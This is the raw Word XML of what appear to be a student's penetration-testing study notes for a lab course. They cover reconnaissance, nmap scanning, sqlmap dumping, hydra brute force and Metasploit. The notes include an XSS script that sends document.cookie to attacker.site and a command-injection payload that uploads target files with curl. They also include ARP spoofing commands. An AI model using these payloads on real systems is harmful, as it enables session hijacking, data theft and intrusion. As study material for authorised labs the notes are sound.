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BE8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# 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pts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="555AD48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Adding network to route table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899214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Routing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459F7F6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route add &lt;network&gt; via &lt;gateway&gt; dev &lt;interface&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E6A87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35D9E39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gathering information’s (passive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FC726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help to Understand the target organization widen the attack surface and amount efficient and targeted attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BD471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5D5BF76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1- Domain enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2ED29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dnsdumpster.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B515F6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sublist3r -d &lt;domain&gt; -o &lt;output file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC5613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whois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&lt;domain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2E2A7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4C1F90F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scanning and fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7208172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help to perform efficient and have knowledge of the scope targets </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6C6C4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49830CF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1- Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394BDB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Ping sweep:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EDD7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Ping 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 for alive hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C3CD3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fping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-a -g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network_id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cidr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2&gt; /dev/null/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA58C4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network_id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cidr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&gt; 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 ping sweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360367F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3BB774D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2- OS fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0809883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70BA627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-O &lt;OS fingerprinting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3961596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For software of hosts running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B0D34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-O &lt;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network_id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cidr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28A5864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711E5DC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3500E71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3- scan ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE865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0863C24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Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762099D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&lt;host discovery, is it up or not&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB9F57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&lt;full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tcp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 way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shake&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0809B61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 syn scan, lighter on the network&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C23A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&lt;import from list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1031C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sV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 version detection&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5451979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-O &lt;OS fingerprinting&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931A44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-A &lt;all&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078B7A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122B26F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vulnerability assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C819CC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help to prepare yourself for exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3368651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46FB2BA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1-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Nessus </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC668A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To run Nessus: /bin/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systemctl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start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nessusd.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52A9B75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lastRenderedPageBreak/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To run web: https://kali:8834/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB7B4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0BE5BB4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2- To scan the XSS vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074F1E4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example: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xsser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'http://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demo.ine.local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index.php?page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dns-lookup.php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' -p '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target_host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XSS&amp;dns-lookup-php-submit-button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Lookup+DNS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' --auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149C1E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05A02CD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3-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nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CE4BB86" w14:textId="657EC852" w:rsid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nikto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-h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4BD7D55E" w14:textId="32216059" w:rsid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457A1112" w14:textId="7F38E4C9" w:rsid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4-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</w:p>
    <w:p w14:paraId="44ADF94B" w14:textId="23B7F420" w:rsidR="00FE72C7" w:rsidRPr="00FE72C7" w:rsidRDefault="00FE72C7" w:rsidP="00FE72C7">
      <w:pPr>
        <w:ind w:left="720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–script vuln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1DFAE85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3DB0385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exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6DEFD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1096F89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1- fingerprinting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACB07B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banner grabbing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3583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netcat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/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nc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&lt;target address&gt; &lt;port&gt; -v &lt;for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verbos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778CD97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** should be all upper case</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717F00F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opennssl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s_client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-connect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: port&gt; &lt;this is for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ssl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tsl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services&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30541A9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httprint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-p0 -h &lt;target host&gt; -s &lt; signature file&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D8C4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424BE6D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2- Find hidden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dier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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E4D9B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cd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dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A823AF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python3 dirsearch.py -u &lt;URL&gt; -e &lt;EXTENSIONS&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D1A2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Dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14803C4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1694626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3- vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558FEC9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0D757C7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3.1- XSS (cross site script):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F356A0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6F31653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Script to show cookie in the alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55058EC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&lt;script&gt;alert(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document.cookie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);&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51435C5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203AF6C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Script for send cookies every time someone enters to contact page by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1119594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&lt;script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1483BD3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var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= new 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Image(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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF6D9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i.src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="http://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attacker.site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get.php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? cookie="+escape(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document.cookie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)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C9FB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7B28D39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web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Page1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B834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My server (receive cookies id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F8393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http://attacker.site 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get.php?p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=&lt;payloads&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B71D6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web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page2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF034B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show cookies Hach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2315B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http://attacker.site/jar.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604E10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5439915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3.2 - SQLi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88F77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lastRenderedPageBreak/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04897F2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-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 &lt;parameter&gt; --technique=&lt;B,U&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E07BA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-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data &lt;data from burp&gt; -p &lt;parameter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F45FC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-r &lt;http request file&gt; --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-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710B324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dbs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show databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5594B79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--tables &lt;show tables&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455407F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-T &lt;select table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2DFC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--columns &lt;show columns&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260FCCF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-C &lt;select columns &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736898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--dump &lt;extract the data&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1247C90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66F8E7F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Example: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7CC5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-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 &lt;parameter&gt; ?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896143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-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p &lt;parameter&gt; ?id=1 -b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1093800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-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p &lt;parameter&gt; ?id=1 --tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A3E09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-p &lt;parameter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?id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=1 --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currennt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db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&lt;database&gt; --columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEBDC57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sqlmap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url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-p &lt;parameter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?id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=1 --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currennt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db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&lt;database&gt; --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570ED7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1853C63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3.3 -MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8758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mysql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-u &lt;username&gt; -p&lt;password&gt; -h &lt;host&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F1FA2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use &lt;name of database&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E15E3B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show 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tables;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="58CE8706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select * from &lt;table name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&gt;;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="061EE86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System Attacks and Network Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC61DC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3.4 -Password crack and brute force:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71C9F0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hydra -L &lt;name list&gt; -P &lt;pass list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telnet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://&lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215CEA4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hydra -L &lt;name list&gt; -P &lt;pass list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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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&gt;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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0493B94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john -wordlist=&lt;word list&gt; &lt;hash file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323871D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unshadow &lt;file&gt; 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&lt;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file.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74787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3.5 -REC: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F010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scp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ssh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@&lt;host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&gt;/path file&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917CE3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talent &lt;domain&gt; -l &lt;name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F48A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ssh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username@domain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09A2463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316CA46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3.6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-Command parameter </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEB663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http://demo.ine.local:8000?cmd&lt;parameter&gt;=curl+&lt;local machine&gt;+--upload-file+&lt;target file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC6C2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7B8DBB6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3.7 -null sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075C4BB2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emumeration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7AD0B251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enum4linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3355D8A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emun4linux -n &lt;domain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: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do an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nmblookup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7F64F84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emun4linux -P &lt;domain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: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to cheek password policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F966AF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emun4linux -S &lt;domain&gt;: will give us information about the SMB shares on the machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2891E97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emun4linux -U &lt;domain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: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to view users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B7018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lastRenderedPageBreak/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emun4linux -a &lt;domain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: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run all simple enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C27CD3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smbclient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-L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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3B69E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smbclient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//&lt;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&gt;/&lt;share folder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415A40D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smbclient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\\\\&lt;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&gt;\\ &lt;share folder&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76FEC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get &lt;share folder&gt; &lt;host path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619F83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Nmap –script-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agrs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=unsafe=1 -–script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smb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-check-vulns -p445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&gt;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old way</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54CFA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Nmap --script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smb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-check-vuln-* -p445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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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  &gt;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&gt;new</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AEA91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5C9A6B8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3.8 -Arp spoofing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C7B34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Echo 1 &gt; /proc/sys/net/ipv4/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ip_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forward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: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to run as router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAF4D3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Echo 0 &gt; /proc/sys/net/ipv4/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ip_</w:t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forward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:to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stop router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2631E9D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Arpspoof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-I &lt;interface&gt; -t &lt;target&gt; -r &lt;host&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E55D4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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7138947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Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A5202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msfconsole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: to run Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF608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search &lt;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search_term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&gt;: search for vulnerability …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B78F4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use &lt;number/name&gt;: Load config. (For exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01A93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set &lt;payload &gt;: For assign payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C62CFB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 run / exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB845EA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Show&lt;any&gt;: list option about payload, exploit……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315F0CB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 xml:space="preserve">Info: show vulnerability information </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267753DF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back: return to main banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD95CDD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  <w:t>Set &lt; variable &gt; &lt; value &gt;: assign value to a variable (for option)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCC75BC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getuid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31CD72E8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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getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60D1CFE0" w14:textId="692C59D2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</w:p>
    <w:p w14:paraId="6C20A089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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB91A5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o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Netcat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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF33BE" w14:textId="77777777" w:rsidR="00FE72C7" w:rsidRPr="00FE72C7" w:rsidRDefault="00FE72C7" w:rsidP="00FE72C7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•</w:t>
      </w:r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ab/>
      </w:r>
      <w:proofErr w:type="gram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Nc  &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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option&gt;  &lt;host&gt;  &lt;port&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E34A19F" w14:textId="5000E0D5" w:rsidR="00F76FCC" w:rsidRPr="00FE72C7" w:rsidRDefault="00FE72C7" w:rsidP="00FE72C7"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Ex: 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nc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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE72C7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 127.0.0.1 4444 (listing on server on port 4444)</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F76FCC" w:rsidRPr="00FE7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C8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B1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53E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA0A18C0"/>
    <w:lvl w:ilvl="0" w:tplc="CA42B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882"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43F6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714"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9550A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10F5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A3023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11220"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="240E9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32E4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9300DB0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7BC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="549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3512"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C28F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461AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="050E67F6"/>
    <w:lvl w:ilvl="0" w:tplc="5C083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D6124"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F156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65854"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF22F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354D31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B5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168A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D4C6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2748E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E48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F1B2E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20EC7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E254E4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="061A9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B67C4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16F04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DB3558"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CBE7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08779B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC366FB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891CC0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A106D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A6682"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01405C3A"/>
    <w:lvl w:ilvl="0" w:tplc="084C8B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856C22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C2AD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F4840"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D5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F099A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17349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52699D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB4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717B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38A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B723C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="720A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BA409D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="14C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81C32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DD36183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7AA02AA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31A03D66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8B3D2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E8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1"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="5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  <w:num w:numId="22">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="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B6"/>
    <w:rsid w:val="000345B2"/>
    <w:rsid w:val="00043A11"/>
    <w:rsid w:val="000564EE"/>
    <w:rsid w:val="000655E7"/>
    <w:rsid w:val="0007577B"/>
    <w:rsid w:val="00082DF5"/>
    <w:rsid w:val="000C4DF1"/>
    <w:rsid w:val="0012400C"/>
    <w:rsid w:val="001303CC"/>
    <w:rsid w:val="00150BE9"/>
    <w:rsid w:val="00166D4D"/>
    <w:rsid w:val="001A21AE"/>
    <w:rsid w:val="001A78F4"/>
    <w:rsid w:val="001B6D77"/>
    <w:rsid w:val="001C1586"/>
    <w:rsid w:val="001C6972"/>
    <w:rsid w:val="001C72DB"/>
    <w:rsid w:val="001E7EC9"/>
    <w:rsid w:val="002555FD"/>
    <w:rsid w:val="002C7D51"/>
    <w:rsid w:val="002F0387"/>
    <w:rsid w:val="00313F4A"/>
    <w:rsid w:val="003271E0"/>
    <w:rsid w:val="003C2DD6"/>
    <w:rsid w:val="003F2CA3"/>
    <w:rsid w:val="00445286"/>
    <w:rsid w:val="00461153"/>
    <w:rsid w:val="004733B6"/>
    <w:rsid w:val="004760F5"/>
    <w:rsid w:val="004E2898"/>
    <w:rsid w:val="00512499"/>
    <w:rsid w:val="005235D2"/>
    <w:rsid w:val="00543031"/>
    <w:rsid w:val="00554FEF"/>
    <w:rsid w:val="00561EC4"/>
    <w:rsid w:val="005633B2"/>
    <w:rsid w:val="00580B78"/>
    <w:rsid w:val="00586C45"/>
    <w:rsid w:val="005A5CDC"/>
    <w:rsid w:val="005A67CA"/>
    <w:rsid w:val="005C5CDE"/>
    <w:rsid w:val="005C7EB3"/>
    <w:rsid w:val="005D04F8"/>
    <w:rsid w:val="005D2732"/>
    <w:rsid w:val="005F517D"/>
    <w:rsid w:val="005F6EB2"/>
    <w:rsid w:val="006A50CD"/>
    <w:rsid w:val="00712ACB"/>
    <w:rsid w:val="00761EC0"/>
    <w:rsid w:val="007B4E06"/>
    <w:rsid w:val="007D6196"/>
    <w:rsid w:val="007E1787"/>
    <w:rsid w:val="00837143"/>
    <w:rsid w:val="008E4B93"/>
    <w:rsid w:val="00912334"/>
    <w:rsid w:val="00953874"/>
    <w:rsid w:val="00986C91"/>
    <w:rsid w:val="009D10F4"/>
    <w:rsid w:val="00A556CB"/>
    <w:rsid w:val="00AD0709"/>
    <w:rsid w:val="00AE77AD"/>
    <w:rsid w:val="00B53216"/>
    <w:rsid w:val="00B7528E"/>
    <w:rsid w:val="00BC0291"/>
    <w:rsid w:val="00BD4EFF"/>
    <w:rsid w:val="00C40A26"/>
    <w:rsid w:val="00C9148C"/>
    <w:rsid w:val="00CC3E05"/>
    <w:rsid w:val="00CC48A5"/>
    <w:rsid w:val="00CD3415"/>
    <w:rsid w:val="00CE0B7A"/>
    <w:rsid w:val="00CF1A5C"/>
    <w:rsid w:val="00D30CC1"/>
    <w:rsid w:val="00D50EA4"/>
    <w:rsid w:val="00D71E45"/>
    <w:rsid w:val="00D74CE9"/>
    <w:rsid w:val="00D8024B"/>
    <w:rsid w:val="00DC1E4D"/>
    <w:rsid w:val="00DF0DE2"/>
    <w:rsid w:val="00E03900"/>
    <w:rsid w:val="00E36398"/>
    <w:rsid w:val="00E77080"/>
    <w:rsid w:val="00EB460E"/>
    <w:rsid w:val="00EB584E"/>
    <w:rsid w:val="00ED0379"/>
    <w:rsid w:val="00ED579C"/>
    <w:rsid w:val="00F34A2A"/>
    <w:rsid w:val="00F35C82"/>
    <w:rsid w:val="00F76FCC"/>
    <w:rsid w:val="00FD204E"/>
    <w:rsid w:val="00F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0A47"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F64B9078-8480-3944-BBF2-044B75C6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1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1E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58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B584E"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D74CE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D74CE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D74CE9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D74CE9"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00953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 سعود مفرح الشهري</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>رهف سعود مفرح الشهري</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-26T16:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-26T16:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>